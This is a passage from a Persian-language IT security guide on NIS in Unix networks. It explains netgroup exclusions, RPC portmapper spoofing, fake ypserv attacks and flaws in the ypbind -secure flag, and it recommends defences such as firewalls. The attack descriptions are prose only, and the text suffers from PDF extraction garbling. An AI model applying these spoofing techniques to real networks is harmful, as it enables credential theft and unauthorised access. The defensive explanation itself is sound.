ﺍﺳﺘﺜﻨﺎﻫﺎ ﺭﺍ ﻗﺒﻞ ﺍﺯ ﮔﺮﻭﻩﻫﺎﻱ ﺷﺒﻜﻪ ﻓﻬﺮﺳﺖ ﻛﻨﻴﺪ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻋﻼﻣﺖ ﺗﻔﺮﻳﻖ ) (-ﻛﺎﺭﺑﺮﺍﻥ ﻳﺎ ﮔﺮﻭﻫﻬﺎﻱ ﻛـﺎﺭﺑﺮﻱ ﺭﺍ ﻣـﺴﺘﺜﻨﻲ
ﻧﻤﺎﻳﻴﺪ.
ﻧﻤﺎﺩﻫﺎﻱ +@netgroupﻭ -@netgroupﺭﻭﻱ ﻫﻤﺔ ﻧﺴﺨﻪﻫﺎﻱ NISﻛﺎﺭ ﻧﻤﻲﻛﻨﻨﺪ ﻭ ﺗﺎ ﻛﻨﻮﻥ ﺭﻭﻱ ﺑﻘﻴﻪ ﻧﺴﺨﻪﻫﺎ ﻫـﻢ ﺑـﺼﻮﺭﺕ
ﻗﺎﺑﻞ ﺍﻃﻤﻴﻨﺎﻥ ﻛﺎﺭ ﻧﻜﺮﺩﻩﺍﻧﺪ .ﺍﮔﺮ ﻗﺼﺪ ﺩﺍﺭﻳﺪ ﺍﺯ ﺍﻳﻦ ﻗﺎﺑﻠﻴﺘﻬﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ ،ﺳﻴﺴﺘﻢ ﺧﻮﺩ ﺭﺍ ﺍﺭﺯﻳﺎﺑﻲ ﻛﻨﻴﺪ ﺗﺎ ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﺁﻧﻬـﺎ ﻫﻤﺎﻧﮕﻮﻧـﻪ
ﻛﻪ ﺑﺎﻳﺪ ﻋﻤﻞ ﻣﻲﻛﻨﻨﺪ .ﻳﺎﺩﺁﻭﺭﻱ ﻣﻲﺷﻮﺩ ﮐﻪ ﺻﺮﻑ ﺧﻮﺍﻧﺪﻥ ﺍﺳﻨﺎﺩ ﺑﺮﺍﻱ ﺍﻳﻦ ﻣﻨﻈﻮﺭ ﻛﻔﺎﻳﺖ ﻧﻤﻲﻛﻨﺪ.
ﻣﺤﺪﻭﺩﻳﺖﻫﺎﻱ NIS
ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ،NISﻧﻘﻄﻪ ﺷﺮﻭﻉ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺗﺠﺮﺑﻴﺎﺕ ﻣﻮﻓﻖ ﺩﺭ ﺷﺒﻜﻪﻫﺎﻱ Unixﺑﻮﺩ .ﭼﻮﻥ NISﺣﺴﺎﺑﻬﺎﻱ ﻛﺎﺭﺑﺮﻱ ﺭﺍ ﻛﻨﺘـﺮﻝ ﻣـﻲﻛﻨـﺪ،
ﺍﮔﺮ ﺑﺘﻮﺍﻧﻴﺪ ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ NISﺭﺍ ﻗﺎﻧﻊ ﻛﻨﻴﺪ ﻛﻪ ﺭﻭﻱ ﻛﻞ ﺷﺒﻜﻪ ﺍﻋﻼﻡ ﻛﻨﺪ ﻛﻪ ﺷﻤﺎ ﻳﻚ ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ ﺩﺍﺭﻳﺪ ،ﻣـﻲﺗﻮﺍﻧﻴـﺪ ﺍﺯ ﺁﻥ
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ٣٣٢
ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ ﺑﺮﺍﻱ ﻧﻔﻮﺫ ﺑﻪ ﻳﻚ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﺓ ﺁﻥ ﺷﺒﻜﻪ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻴﺪ NIS .ﻫﻤﭽﻨـﻴﻦ ﻣـﻲﺗﻮﺍﻧـﺪ ﺍﻃﻼﻋـﺎﺕ ﻣﺤﺮﻣﺎﻧـﻪﺍﻱ ﻣﺜـﻞ
ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺭﻣﺰﺷﺪﻩ ﺭﺍ ﺩﺭ ﺩﺳﺘﺮﺱ ﻋﻤﻮﻡ ﻗﺮﺍﺭ ﺩﻫﺪ.
ﺩﺭ ﭘﻴﺎﺩﻩﺳﺎﺯﻳﻬﺎﻱ ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ﻣﺨﺘﻠﻒ NISﭼﻨﺪ ﻧﻘﺺ ﻃﺮﺍﺣﻲ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺑﻪ ﻛﺎﺭﺑﺮ ﺍﺟﺎﺯﻩ ﻣﻲﺩﻫﺪ ﺳﻴﺴﺘﻢ NISﺭﺍ ﭘﻴﻜﺮﺑﻨﺪﻱ ﻣﺠﺪﺩ
ﻭ ﮔﻤﺮﺍﻩ ﻛﻨﺪ .ﺍﻳﻦ ﮔﻤﺮﺍﻩﺳﺎﺯﻱ ﺑﻪ ﺩﻭ ﺭﻭﺵ ﻣﻲﺗﻮﺍﻧﺪ ﺍﻧﺠﺎﻡ ﮔﻴﺮﺩ :ﮔﻤﺮﺍﻩﺳﺎﺯﻱ ﺳﻴﺴﺘﻢ ﻓﺮﺍﺧﻮﺍﻧﻲ ﺗﺎﺑﻊ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ،ﻭ ﮔﻤﺮﺍﻩﺳﺎﺯﻱ .NIS
ﮔﻤﺮﺍﻩﺳﺎﺯﻱ RPC
ﻓﺮﺍﺧﻮﺍﻧﻲ ﺗﺎﺑﻊ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ) ١٥٩(RPCﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺘﺼﻞ ﺑﻪ ﺷﺒﻜﻪ ﺭﺍ ﻗﺎﺩﺭ ﻣﻲﺳﺎﺯﺩ ﻛﻪ ﺗﻮﺍﺑﻊ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺩﻳﮕﺮ ﺭﺍ ﻓﺮﺍﺧﻮﺍﻧﻲ ﻛﻨﻨﺪ .ﺳﻴﺴﺘﻢ
NISﺑﻪ ﻋﻤﻠﻜﺮﺩ ﺳﺮﻭﻳﺴﻬﺎﻱ - RPC portmapperﻳﻚ daemonﻛﻪ ﻧﺎﻣﻬﺎﻱ ﺧـﺪﻣﺎﺕ ﺍﺭﺍﺋـﻪﺷـﺪﻩ ﺑـﺮﺍﻱ RPCﺭﺍ ﺑـﺎ ﺷـﻤﺎﺭﺓ
ﭘﻮﺭﺗﻬﺎﻱ IPﻛﻪ ﻣﻲﺗﻮﺍﻥ ﺑﺎ ﺁﻥ ﺧﺪﻣﺎﺕ ﺗﻤﺎﺱ ﺑﺮﻗﺮﺍﺭ ﻛﺮﺩ ﻣﻄﺎﺑﻘﺖ ﻣﻲﺩﻫﺪ -ﻭﺍﺑﺴﺘﻪ ﺍﺳﺖ .ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻳﻲ ﻛﻪ ﺍﺯ RPCﺍﺳـﺘﻔﺎﺩﻩ
ﻣﻲﻛﻨﻨﺪ ﻭﻗﺘﻲ ﻛﺎﺭﺷﺎﻥ ﺁﻏﺎﺯ ﻣﻲﺷﻮﺩ ﺧﻮﺩ ﺭﺍ ﺑﺎ portmapperﺛﺒﺖ ﻣﻲﻧﻤﺎﻳﻨﺪ ،ﻭ ﺯﻣﺎﻧﻴﻜﻪ ﻛﺎﺭﺷﺎﻥ ﺑﻪ ﭘﺎﻳﺎﻥ ﻣﻲﺭﺳﺪ ﻳﺎ ﭘﻴﻜﺮﺑﻨﺪﻱ ﻣﺠﺪﺩ
ﻣﻲﮔﺮﺩﻧﺪ ،ﺧﻮﺩﺷﺎﻥ ﺭﺍ ﺍﺯ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﻩ portmapperﺣﺬﻑ ﺧﻮﺍﻫﻨﺪ ﻛﺮﺩ.
ﺩﺭ ﻧﺴﺨﻪﻫﺎﻱ ﺍﻭﻟﻴﺔ portmapperﻫﺮ ﺑﺮﻧﺎﻣﻪﺍﻱ ﻗﺎﺩﺭ ﺑﻮﺩ ﺧﻮﺩ ﺭﺍ ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨـﺪﺓ RPCﺛﺒـﺖ ﻛﻨـﺪ ،ﻭ ﺍﻳـﻦ ﻣـﺴﺌﻠﻪ ﺑـﻪ
ﻣﻬﺎﺟﻤﻴﻦ ﻓﺮﺻﺖ ﻣﻲﺩﺍﺩ ﻛﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ NISﺧﻮﺩ ﺭﺍ ﺛﺒﺖ ﻛﻨﻨﺪ ﻭ ﺑﺎ ﻓﺎﻳﻠﻬﺎﻱ ﺭﻣﺰ ﻋﺒﻮﺭ ﺧﻮﺩﺷﺎﻥ ﺑﻪ ﺩﺭﺧﻮﺍﺳـﺘﻬﺎ ﭘﺎﺳـﺦ ﺩﻫﻨـﺪ.
ﺑﻴﺸﺘﺮ ﻧﺴﺨﻪﻫﺎﻱ ﻓﻌﻠﻲ portmapperﺗﻘﺎﺿﺎﻫﺎﻱ ﺛﺒﺖ ﻳﺎ ﺣﺬﻑ ﺧﺪﻣﺎﺕ ﺭﺍ ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﺍﺯ ﺩﺳﺘﮕﺎﻩ ﺭﺍﻩ ﺩﻭﺭ ﺁﻣﺪﻩ ﺑﺎﺷﺪ ،ﻳﺎ ﺑﻪ ﻳﻚ ﭘﻮﺭﺕ
ﻣﺠﺎﺯ ﺑﺎﺯﮔﺮﺩﺩ ﻛﻪ ﺍﺯ ﻳﻚ ﺍﺗﺼﺎﻝ ﺷﺮﻭﻉﺷﺪﻩ ﺍﺯ ﻳﻚ ﭘﻮﺭﺕ ﻏﻴﺮﻣﺠﺎﺯ ﻣﻲﺁﻳﺪ ،ﺭﺩ ﻣﻲﻛﻨﻨﺪ .ﺑﻨﺎﺑﺮﺍﻳﻦ ﺗﻨﻬﺎ ﻛﺎﺭﺑﺮ ﺍﺻﻠﻲ ﻣﻲﺗﻮﺍﻧـﺪ ﺗﻘﺎﺿـﺎﻫﺎﻳﻲ
ﺑﺮﺍﻱ ﺍﺿﺎﻓﻪ ﻭ ﺣﺬﻑ ﻛﺮﺩﻥ ﻧﮕﺎﺷﺘﻬﺎﻱ ﺧﺪﻣﺎﺕ ﺑﻪ ﭘﻮﺭﺗﻬﺎﻱ ﻣﺠﺎﺯ ﺍﻧﺠﺎﻡ ﺩﻫﺪ ،ﻭ ﺗﻤﺎﻡ ﺗﻘﺎﺿﺎﻫﺎ ﻓﻘﻂ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﺑـﺼﻮﺭﺕ ﻣﺤﻠـﻲ ﺍﻧﺠـﺎﻡ
ﺷﻮﻧﺪ .ﺑﺎ ﺍﻳﻨﺤﺎﻝ ﻧﺴﺨﻪﻫﺎﻱ portmapper daemonﻣﺮﺑﻮﻁ ﺑﻪ ﻫﻤﺔ ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ﺍﻳﻦ ﺑﺮﺭﺳﻴﻬﺎ ﺭﺍ ﺍﻧﺠﺎﻡ ﻧﻤﻲﺩﻫﻨﺪ.
ﻻ ﺭﻭﻱ ﭘﻮﺭﺗﻬﺎﻱ ﻏﻴﺮﻣﺠـﺎﺯ ﺛﺒـﺖ ﻣـﻲﺷـﻮﻧﺪ .ﺍﺯ ﻟﺤـﺎﻅ ﻧﻈـﺮﻱ ﺣﺘـﻲ ﺑـﺎ ﺗﻮﺟﻪ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛﻪ NFSﻭ ﺑﻌﻀﻲ ﺍﺯ ﺧﺪﻣﺎﺕ NISﻣﻌﻤﻮ ﹰ
ﺑﺮﺭﺳﻴﻬﺎﻳﻲ ﻛﻪ ﺩﺭ ﺑﺎﻻ ﻓﻬﺮﺳﺖ ﺷﺪ ،ﻣﻬﺎﺟﻢ ﻣﻲﺗﻮﺍﻧﺪ ﻳﻜﻲ ﺍﺯ ﺍﻳﻦ ﺧﺪﻣﺎﺕ ﺭﺍ ﺑﺎ ﻳـﻚ ﺑﺮﻧﺎﻣـﺔ ﻣﺨـﺼﻮﺹ ﺟـﺎﻳﮕﺰﻳﻦ ﻛﻨـﺪ ﺗـﺎ ﺑﺘﻮﺍﻧـﺪ ﺑـﻪ
ﺗﻘﺎﺿﺎﻫﺎﻱ ﺳﻴﺴﺘﻢ ﺑﮕﻮﻧﻪﺍﻱ ﭘﺎﺳﺦ ﺩﻫﺪ ﻛﻪ ﺍﻣﻨﻴﺖ ﺳﻴﺴﺘﻢ ﺧﺪﺷﻪﺩﺍﺭ ﮔﺮﺩﺩ.
ﮔﻤﺮﺍﻩﺳﺎﺯﻱ NIS
ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﮔﺎﻥ NISﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ،RPCﺍﺯ ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ NISﺍﻃﻼﻋﺎﺕ ﺩﺭﻳﺎﻓﺖ ﻣﻲﻛﻨﻨﺪ .ﻳﻚ daemonﻣﺤﻠﻲ ﺑـﻪ ﻧـﺎﻡ
ypbindﺍﻃﻼﻋﺎﺕ ﺗﻤﺎﺱ ﺭﺍ ﺑﺮﺍﻱ daemonﻣﺮﺑﻮﻃﺔ ﺳﺮﻭﻳﺲﺩﻫﻨـﺪﻩ NISﺑـﻪ ﻧـﺎﻡ ypservﺩﺭ ﺣﺎﻓﻈـﻪ ﻧﮕـﻪ ﻣـﻲﺩﺍﺭﺩypserv .
ﻣﻲﺗﻮﺍﻧﺪ ﺑﺼﻮﺭﺕ ﻣﺤﻠﻲ ﻳﺎ ﺭﺍﻩ ﺩﻭﺭ ﺍﺟﺮﺍ ﺷﺪﻩ ﺑﺎﺷﺪ.
ﺗﺤﺖ ﻧﺴﺨﻪﻫﺎﻱ ﺍﻭﻟﻴﺔ Sun OSﺍﺯ ﺧﺪﻣﺎﺕ ) NISﻭ ﺍﺣﺘﻤﺎ ﹰﻻ ﻧﺴﺨﻪﻫﺎﻱ ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ﺩﻳﮕﺮ( ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﻭﺟﻮﺩ ﺩﺍﺷﺖ ﻛﻪ ﻳﻚ ﺑﺮﻧﺎﻣﻪ ﻛﻪ ﻣﺜﻞ
ypservﻛﺎﺭ ﻣﻲﻛﻨﺪ ﻭ ﺑﻪ ﺗﻘﺎﺿﺎﻫﺎﻱ ypbindﺟﻮﺍﺏ ﻣﻲﺩﻫﺪ ﺭﺍ instantiateﻛﺮﺩ .ﺩﺭ ﺁﻧـﺼﻮﺭﺕ ﻣـﻲﺗـﻮﺍﻥ ﺑـﻪ deamonﻣﺤﻠـﻲ
ypbindﻓﺮﻣﺎﻥ ﺩﺍﺩ ﻛﻪ ﺑﺠﺎﻱ ypservﻭﺍﻗﻌﻲ ﺍﺯ ﺁﻥ ﺑﺮﻧﺎﻣﻪ ﻣﺸﺎﺑﻪ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﺪ .ﺑﻨﺎﺑﺮﺍﻳﻦ ﻣﻬﺎﺟﻢ ﻣﻲﺗﻮﺍﻧﺪ ﺳﻴﺴﺘﻢ ﺭﺍ ﻃﻮﺭﻱ ﭘﻴﻜﺮﺑﻨﺪﻱ
ﻛﻨﺪ ﻛﻪ ﺑﺮﺍﻱ ﻣﺜﺎﻝ ﻧﺴﺨﺔ ﺧﻮﺩﺵ ﺍﺯ ﻓﺎﻳﻞ ﺭﻣﺰ ﻋﺒﻮﺭ ﺑﺮﺍﻱ ﭘﺎﺳﺨﮕﻮﻳﻲ ﺑﻪ ﺗﻘﺎﺿﺎﻫﺎﻱ ﻭﺭﻭﺩ ﺑﻪ ﺳﻴﺴﺘﻢ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺑﮕﻴﺮﺩ!
ﭘﻴﺎﺩﻩﺳﺎﺯﻳﻬﺎﻱ ﻓﻌﻠﻲ NISﺍﺯ ypbindﺣﺎﻭﻱ ﻳﻚ ﭘﺎﺭﺍﻣﺘﺮ ﺧﻂ ﻓﺮﻣﺎﻥ -secureﻳﺎ -sﺍﺳﺖ ﻛﻪ ﻫﻨﮕﺎﻡ ﺻﺪﻭﺭ ﺩﺳﺘﻮﺭ ﺷـﺮﻭﻉ ﺑـﻪ ﻛـﺎﺭ
daemonﻣﻲﺗﻮﺍﻧﺪ ﺑﻜﺎﺭ ﺭﻭﺩ .ﺍﮔﺮ ﺍﺯ ﺍﻳﻦ ﭘﺎﺭﺍﻣﺘﺮ ﺍﺳﺘﻔﺎﺩﻩ ﺷﺪﻩ ﺑﺎﺷﺪ ypbind daemon ،ﻫﻴﭻ ﺍﻃﻼﻋﺎﺗﻲ ﺭﺍ ﺍﺯ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﻩﻫـﺎﻱ
ypservﻛﻪ ﺭﻭﻱ ﭘﻮﺭﺗﻬﺎﻱ ﻣﺠﺎﺯ ﺍﺟﺮﺍ ﻧﻤﻲﺷﻮﻧﺪ ﻧﺨﻮﺍﻫﺪ ﭘﺬﻳﺮﻓﺖ .ﻟﺬﺍ ﺍﮔﺮ ﻛﺎﺭﺑﺮﻱ ﺑﺨﻮﺍﻫـﺪ ﻳـﻚ ypserve daemonﺟﻌﻠـﻲ ﻭﺍﺭﺩ
ﻻ ﺩﻟﻴﻞ ﻗﺎﻧﻊﻛﻨﻨﺪﻩﺍﻱ ﺑﺮﺍﻱ ﻋﺪﻡ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﭘﺎﺭﺍﻣﺘﺮ -secureﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ.
ﺣﺎﻓﻈﻪ ﻛﻨﺪ ﺗﻼﺷﺶ ﻧﺎﺩﻳﺪﻩ ﮔﺮﻓﺘﻪ ﻣﻲﺷﻮﺩ .ﻣﻌﻤﻮ ﹰ
ﻣﺘﺄﺳﻔﺎﻧﻪ ﭘﺎﺭﺍﻣﺘﺮ -secureﺩﺍﺭﺍﻱ ﻳﻚ ﻧﻘﺺ ﺍﺳﺖ .ﺍﮔﺮ ﻣﻬﺎﺟﻢ ﺑﺘﻮﺍﻧﺪ ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ rootﺭﺍ ﺭﻭﻱ ﻫﺮ ﻣﺎﺷﻴﻦ ﺩﻳﮕﺮ ﻣﺘﺼﻞ ﺑﻪ ﺷـﺒﻜﻪ
ﻣﺤﻠﻲ ﻋﻮﺽ ﻛﻨﺪ ﻭ ﻳﻚ ﻧﺴﺨﻪ ﺍﺯ ypservﺭﺍ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻃﻼﻋﺎﺕ NISﺧﻮﺩﺵ ﺑـﻪ ﺍﺟـﺮﺍ ﺩﺭﺁﻭﺭﺩ ،ﺑـﺮﺍﻱ ﺍﻧﺠـﺎﻡ ﺣﻤﻠـﻪ ﺗﻨﻬـﺎ ﺑﺎﻳـﺪ
ypbindﻫﺪﻑ ﺭﺍ ﺑﻪ ﺁﻥ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺍﺷﺎﺭﻩ ﺩﻫﺪ .ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻣﻮﺭﺩ ﺣﻤﻠﻪ ﻭﺍﻗﻊﺷﺪﻩ ﻣﻤﻜﻦ ﺍﺳﺖ ﺭﻭﻱ ﻳﻚ ﭘـﻮﺭﺕ ﻣﺠـﺎﺯ ﺩﺭﺣـﺎﻝ
ﺍﺟﺮﺍ ﺑﺎﺷﺪ ،ﻭ ﻟﺬﺍ ﭘﺎﺳﺨﻬﺎﻱ ﺁﻥ ﺭﺩ ﻧﺨﻮﺍﻫﻨﺪ ﺷﺪ .ﻣﻬﺎﺟﻢ ﻫﻤﭽﻨﻴﻦ ﻣﻲﺗﻮﺍﻧﺪ ﻳﻚ ypservﻗﻼﺑﻲ ﺑﻨﻮﻳﺴﺪ ﻛﻪ ﺭﻭﻱ ﻳﻚ ﺳﻴـﺴﺘﻢ ﺳـﺎﺯﮔﺎﺭ
ﺑﺎ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺷﺨﺼﻲ ﺑﻪ ﺍﺟﺮﺍ ﺩﺭﺁﻳﺪ .ﭘﻮﺭﺗﻬﺎﻱ ﻣﺠﺎﺯ ﺩﺭ ﺍﻳﻨﺤﺎﻟﺖ ﻣﻌﻨﺎﻱ ﺧﺎﺻﻲ ﻧﺪﺍﺭﻧﺪ ،ﻟﺬﺍ ﻫﺮ ﻛﺎﺭﺑﺮ ﻣﻲﺗﻮﺍﻧﺪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺭﺍ ﺭﻭﻱ ﻫـﺮ
ﭘﻮﺭﺗﻲ ﺍﺟﺮﺍ ﻛﻨﺪ ﻭ ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﺑﺮﺍﻱ ﺭﻭﻧﺪ ypbindﻣﻘﺼﺪ ﺗﺄﻣﻴﻦ ﻧﻤﺎﻳﺪ.
ﻋﺒﻮﺭ ﺭﻣﺰﮔﺬﺍﺭﻱﺷﺪﻩ ﺭﺍ ﺑﻪ "" ﺗﻐﻴﻴﺮ ﺑﺪﻩ" ،ﻭ ﺍﻳﻨﻜﺎﺭ ﻃﺒﻴﻌﺘﹰﺎ ﺍﺯ ﻭﺭﻭﺩ ﻫﺮ ﻛﺴﻲ ﺑﻪ ﺳﻴﺴﺘﻢ ﺟﻠﻮﮔﻴﺮﻱ ﻣﻲﻛﺮﺩ .ﺑﻨﺎﺑﺮﺍﻳﻦ ﻭﺟﻮﺩ ﺍﻳـﻦ ﻗﻠـﻢ ﺩﺍﺩﻩ
ﻫﻢ ﺻﺤﻴﺢ ﻧﺒﻮﺩ!
ﻱ " "+ﺑـﺮﺍﻱ ﻭﺭﻭﺩ ﺑـﻪ ﺳـﺮﻭﻳﺲﮔﻴﺮﻧـﺪﻩﻫـﺎ ﻭ ﻳﻜﻲ ﺍﺯ ﺳﺎﺩﻩﺗﺮﻳﻦ ﺭﺍﻫﻬـﺎ ﺑـﺮﺍﻱ ﺭﻭﻳـﺎﺭﻭﻳﻲ ﺑـﺎ ﺍﻳـﻦ ﺳـﺮﺩﺭﮔﻤﻲ ،ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﻧـﺎﻡ ﻛـﺎﺭﺑﺮ ﹺ
ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ NISﺍﺳﺖ .ﻫﻤﭽﻨﻴﻦ ﻣﻲﺗﻮﺍﻧﻴﺪ ﻛﺎﺑﻞ ﺷﺒﻜﻪ ﺭﺍ ﺩﺭ ﺁﻭﺭﻳﺪ ﻭ ﺳﭙﺲ ﺑﺮﺍﻱ ﻭﺭﻭﺩ ﺑﻪ ﺳﻴﺴﺘﻢ ﺗﻼﺵ ﻛﻨﻴﺪ ،ﺗﺎ ﺍﺗﻔـﺎﻗﻲ ﻛـﻪ
ﻫﻨﮕﺎﻡ ﺩﺭ ﺩﺳﺘﺮﺱ ﻧﺒﻮﺩﻥ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ NISﺑﺮﺍﻱ ﺭﺍﻳﺎﻧﻪ ﻣﻲﺍﻓﺘﺪ ﺷﺒﻴﻪﺳﺎﺯﻱ ﺷﻮﺩ .ﺩﺭ ﻫﺮ ﺩﻭ ﺣﺎﻟﺖ ﻧﺒﺎﻳﺪ ﺑﺘﻮﺍﻧﻴﺪ ﻓﻘﻂ ﺑﺎ ﺗﺎﻳﭗ ﻛـﺮﺩﻥ
" "+ﺑﻌﻨﻮﺍﻥ ﻧﺎﻡ ﻛﺎﺭﺑﺮﻱ ﻭﺍﺭﺩ ﺳﻴﺴﺘﻢ ﺷﻮﻳﺪ .ﺍﻳﻦ ﺁﺯﻣﻮﻥ ﺑﻪ ﺷﻤﺎ ﺧﻮﺍﻫﺪ ﮔﻔﺖ ﻛﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺑﺪﺭﺳﺘﻲ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺷﺪﻩ ﻳﺎ ﺧﻴﺮ.
ﺍﮔﺮ ﻧﺴﺨﺔ ﺟﺪﻳﺪﻱ ﺍﺯ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﺧﻮﺩ ﺭﺍ ﺍﺟﺮﺍ ﻣﻲﻛﻨﻴﺪ ،ﮔﻤﺎﻥ ﻧﻜﻨﻴﺪ ﻛﻪ ﺳﻴﺴﺘﻤﺘﺎﻥ ﻧـﺴﺒﺖ ﺑـﻪ ﺳـﺮﺩﺭﮔﻤﻲ ﺯﻳﺮﺳﻴـﺴﺘﻤﻬﺎﻱ NISﺩﺭ
ﻗﺒﺎﻝ " "+ﺍﻳﻤﻦ ﺍﺳﺖ .ﺑﻄﻮﺭ ﺧﺎﺹ ،ﺑﻌﻀﻲ ﺍﺯ ﻧﺴﺨﻪﻫﺎﻱ NISﺭﻭﻱ Linuxﻫﻢ ﺍﻳﻦ ﺍﺷﺘﺒﺎﻩ ﺭﺍ ﻣﺮﺗﻜﺐ ﻣﻲﺷﻮﻧﺪ.
۱۶۰ﺩﺭ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ Sunﺍﺯ NISﻭ ﺷﺎﻳﺪ ﺑﻌﻀﻲ ﭘﻴﺎﺩﻩﺳﺎﺯﻳﻬﺎﻱ ﺩﻳﮕﺮ ،ﺍﻳﻦ ﺧﻄﺮ ﻣﻲﺗﻮﺍﻧـﺪ ﺑـﺎ ﺟﻠـﻮﮔﻴﺮﻱ ﺍﺯ ﺗﻐﻴﻴـﺮ ﻣﻘـﺎﺩﻳﺮ UIDﻭ GIDﺍﻗـﻼﻡ NISﻣﻮﺟـﻮﺩ ﺩﺭ ﻓﺎﻳـﻞ
passwdﺑﻪ ﺻﻔﺮ ،ﻭ ﻳﺎ ﺳﺎﻳﺮ ﻣﻘﺎﺩﻳﺮ ﺗﻮﺳﻂ ﻛﺎﺭﺑﺮﺍﻥ ﻣﺤﻠﻲ ﺑﻪ ﻧﻮﻋﻲ ﺍﺻﻼﺡ ﺷﻮﺩ.
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ٣٣٤
ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﻩﻫﺎﻱ NISﺷﺎﻣﻞ ﺍﻃﻼﻋﺎﺕ ﺣﺴﺎﺳﻲ ﺍﺳﺖ .ﭼﻨﺪﻳﻦ ﺭﺍﻩ ﺑﺮﺍﻱ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺍﻓﺸﺎﻱ ﻏﻴﺮﻣﺠﺎﺯ ﺍﻃﻼﻋﺎﺕ ﭘﺎﻳﮕـﺎﻩ ﺩﺍﺩﻩﻫـﺎﻱ NIS
١٦١
ﻭﺟﻮﺩ ﺩﺍﺭﺩ .ﻣﺜﻞ ﺑﻴﺸﺘﺮ ﺑﻬﺒﻮﺩﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ،ﻣﻲﺗﻮﺍﻧﻴﺪ ﭼﻨﺪ ﻣﻮﺭﺩ ﺍﺯ ﺍﻳﻦ ﺭﻭﺷﻬﺎ ﺭﺍ ﺍﺩﻏﺎﻡ ﻛﻨﻴﺪ ﺗﺎ ﻳﻚ ﺭﻭﺵ ﺩﻓـﺎﻉ ﺩﺭ ﻋﻤـﻖ ﭼﻨـﺪ ﻻﻳـﻪ
ﺑﺪﺳﺖ ﺁﻭﺭﻳﺪ:
ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﻳﺎ ﺣﺪﺍﻗﻞ ﻳﻚ ﻣﺴﻴﺮﻳﺎﺏ ﻫﻮﺷﻤﻨﺪ ﺍﺯ ﭘﺎﻳﮕﺎﻩ ﺧﻮﺩ ﻣﺤﺎﻓﻈﺖ ﻛﻨﻴﺪ ﻭ ﺍﺟﺎﺯﻩ ﻧﺪﻫﻴﺪ ﺑﺴﺘﻪﻫﺎﻱ UDPﻣﺮﺗﺒﻂ .١
ﺑﺎ RPCﻣﻴﺎﻥ ﺷﺒﻜﺔ ﺩﺍﺧﻠﻲ ﻭ ﺩﻧﻴﺎﻱ ﺑﻴﺮﻭﻧﻲ ﻣﺒﺎﺩﻟـﻪ ﺷـﻮﻧﺪ .ﻣﺘﺄﺳـﻔﺎﻧﻪ ﺑـﻪ ﺍﻳـﻦ ﻋﻠـﺖ ﻛـﻪ RPCﺑـﺮ ﺍﺳـﺎﺱ portmapper
